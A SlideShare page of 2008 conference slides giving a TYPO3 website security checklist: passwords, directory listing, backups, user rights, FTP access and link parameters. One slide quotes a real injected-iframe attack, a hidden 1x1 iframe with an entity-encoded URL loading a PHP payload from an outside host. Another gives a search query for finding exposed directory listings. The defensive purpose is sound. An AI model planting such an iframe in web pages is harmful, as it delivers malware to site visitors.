SlideShare une entreprise Scribd logo

Security Checklist for TYPO3

jweiland
jweiland

Security Checklist for TYPO3

Technologie
1  sur  22
Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008
TYPO3 has quite a good security history...
but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required
Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...
md5.rednoize.com
md5 Hash Lookup
Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modifiedquot; size
Backup Your Data • Regularly (cronjob) • Directories: fileadmin, typo3conf, uploads • Database: mysqldump --opt > filename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot
also check for www.domain.com/../system/ not being accessible
database.sql
md5.rednoize.com
Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account
FTP Accounts • Only give access to fileadmin/user_upload/...
When crisis strikes...
• „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“
iframe Attacks <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47; &#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118; &#104;&#107;&#46;&#99;&#111;&#109;&#47; &#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52; &#50;&#46;&#112;&#104;&#112;' width=1 height=1> </iframe>
Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: config.linkVars = L(0-4)
Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netfielders.de
Questions ?

Recommandé

Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersNetsparker
 
Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013jweiland
 
TYPO3 Caching
TYPO3 CachingTYPO3 Caching
TYPO3 Cachingjweiland
 
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...jweiland
 
Make Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites FlyMake Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites Flyjweiland
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
How Not To Code Flex Applications
How Not To Code Flex ApplicationsHow Not To Code Flex Applications
How Not To Code Flex Applicationsjeff tapper
 

Recommandé

Bypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersBypassing Web Application Firewalls and other security filters
Bypassing Web Application Firewalls and other security filtersNetsparker
 
Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013Langsame webseiten nerven okt-2013
Langsame webseiten nerven okt-2013jweiland
 
TYPO3 Caching
TYPO3 CachingTYPO3 Caching
TYPO3 Cachingjweiland
 
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...
Spark Plugs, Oil Change, Filter - How to keep your TYPO3 site running with re...jweiland
 
Make Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites FlyMake Your TYPO3 Web Sites Fly
Make Your TYPO3 Web Sites Flyjweiland
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...CODE BLUE
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
How Not To Code Flex Applications
How Not To Code Flex ApplicationsHow Not To Code Flex Applications
How Not To Code Flex Applicationsjeff tapper
 
Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operationsDaniel López Jiménez
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example360|Conferences
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Nathan Winters
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get StungBarry Dorrans
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Jeff Jones
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Appsadunne
 
Cooking with Chef
Cooking with ChefCooking with Chef
Cooking with ChefOrlando_Ruby_Users_Group
 
Api Design
Api DesignApi Design
Api Designsumithra jonnalagadda
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Kommons
KommonsKommons
KommonsAntonio Terreno
 
T5 Oli Aro
T5 Oli AroT5 Oli Aro
T5 Oli AroJavier Toledo
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik OpcodesCODE BLUE
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)Raviteja Chowdary Adusumalli
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
 
clang-intro
clang-introclang-intro
clang-introHajime Morrita
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web Appelliando dias
 
Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3jweiland
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshopjweiland
 

Contenu connexe

Similaire à Security Checklist for TYPO3

Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operationsDaniel López Jiménez
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAtlassian
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureAndrew Petukhov
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example360|Conferences
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Nathan Winters
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Jeff Jones
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Appsadunne
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceSaumil Shah
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik OpcodesCODE BLUE
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web Appelliando dias
 

Similaire à Security Checklist for TYPO3 (20)

Understanding and hiding your operations
Understanding and hiding your operationsUnderstanding and hiding your operations
Understanding and hiding your operations
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
Administrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA HumAdministrivia: Golden Tips for Making JIRA Hum
Administrivia: Golden Tips for Making JIRA Hum
 
No locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructureNo locked doors, no windows barred: hacking OpenAM infrastructure
No locked doors, no windows barred: hacking OpenAM infrastructure
 
Jun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By ExampleJun Heider - Flex Application Profiling By Example
Jun Heider - Flex Application Profiling By Example
 
Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3Rhonda Layfield Sniffing Your Network With Netmon 3.3
Rhonda Layfield Sniffing Your Network With Netmon 3.3
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get Stung
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!
 
Web 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web AppsWeb 2.0 Performance and Reliability: How to Run Large Web Apps
Web 2.0 Performance and Reliability: How to Run Large Web Apps
 
Cooking with Chef
Cooking with ChefCooking with Chef
Cooking with Chef
 
Api Design
Api DesignApi Design
Api Design
 
Teflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surfaceTeflon - Anti Stick for the browser attack surface
Teflon - Anti Stick for the browser attack surface
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Kommons
KommonsKommons
Kommons
 
T5 Oli Aro
T5 Oli AroT5 Oli Aro
T5 Oli Aro
 
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
 
Ethical hacking (2)
Ethical hacking (2)Ethical hacking (2)
Ethical hacking (2)
 
Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.Clearance: Simple, complete Ruby web app authentication.
Clearance: Simple, complete Ruby web app authentication.
 
clang-intro
clang-introclang-intro
clang-intro
 
9 Ways to Hack a Web App
9 Ways to Hack a Web App9 Ways to Hack a Web App
9 Ways to Hack a Web App
 

Plus de jweiland

Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3jweiland
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshopjweiland
 
30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider30 questions that you should ask your hosting provider
30 questions that you should ask your hosting providerjweiland
 
Why RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix itWhy RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix itjweiland
 
Using TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needsUsing TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needsjweiland
 

Plus de jweiland (6)

Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3Langsame webseiten nerven- Tipps für TYPO3
Langsame webseiten nerven- Tipps für TYPO3
 
Solr typo3 konfiguration workshop
Solr typo3 konfiguration workshopSolr typo3 konfiguration workshop
Solr typo3 konfiguration workshop
 
30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider30 questions that you should ask your hosting provider
30 questions that you should ask your hosting provider
 
TYPO3 SEO
TYPO3 SEOTYPO3 SEO
TYPO3 SEO
 
Why RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix itWhy RealURL sucks - and how to fix it
Why RealURL sucks - and how to fix it
 
Using TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needsUsing TSconfig to tailor TYPO3 to your needs
Using TSconfig to tailor TYPO3 to your needs
 

Dernier

What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 

Dernier (20)

What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 

Security Checklist for TYPO3

  • 1. Avoiding the bad guys Security Checklist for TYPO3 International TYPO3 Conference Berlin, 2008
  • 2. TYPO3 has quite a good security history...
  • 3. but ... • TYPO3 is not „implement and forget“ • Regular checks and updates are required
  • 4. Secure Passwords • 9 or more characters • Mixed upper/lowercase • Do not use the same password everywhere • Change regularly • Passwords are stored as md5 hash, but...
  • 7. Disable Directory Listing • in httpd.conf change Options All Indexes FollowSymLinks to Options All FollowSymLinks • Google Search intitle:quot;index ofquot; quot;last modifiedquot; size
  • 8. Backup Your Data • Regularly (cronjob) • Directories: fileadmin, typo3conf, uploads • Database: mysqldump --opt > filename • Not only for the last one or two days • Copy or download to external media • Verify! • Do not store inside docroot
  • 10.
  • 11.
  • 14.
  • 15. Backend Users • Editors should NEVER have admin rights • Check list of BE users for valid entries • Temporary editors (students, contract workers): set expiration date for account
  • 16. FTP Accounts • Only give access to fileadmin/user_upload/...
  • 18. • „...the web forum software had an unannounced security patch silently released by the vendor nine days ago. The defacement gang learned of the vulnerability and went through the net searching for vulnerable forums and changed the front page of such forums to their quot;greetingquot;.“
  • 19. iframe Attacks <iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47; &#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118; &#104;&#107;&#46;&#99;&#111;&#109;&#47; &#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52; &#50;&#46;&#112;&#104;&#112;' width=1 height=1> </iframe>
  • 20. Link Manipulation • www.domain.com/ index.php&L=2&www.badsite.com • Limit range of linkVars: config.linkVars = L(0-4)
  • 21. Further Information • TYPO3 Security Cookbook available at typo3.org/teams/security/ • TYPO3 announce list available at lists.netfielders.de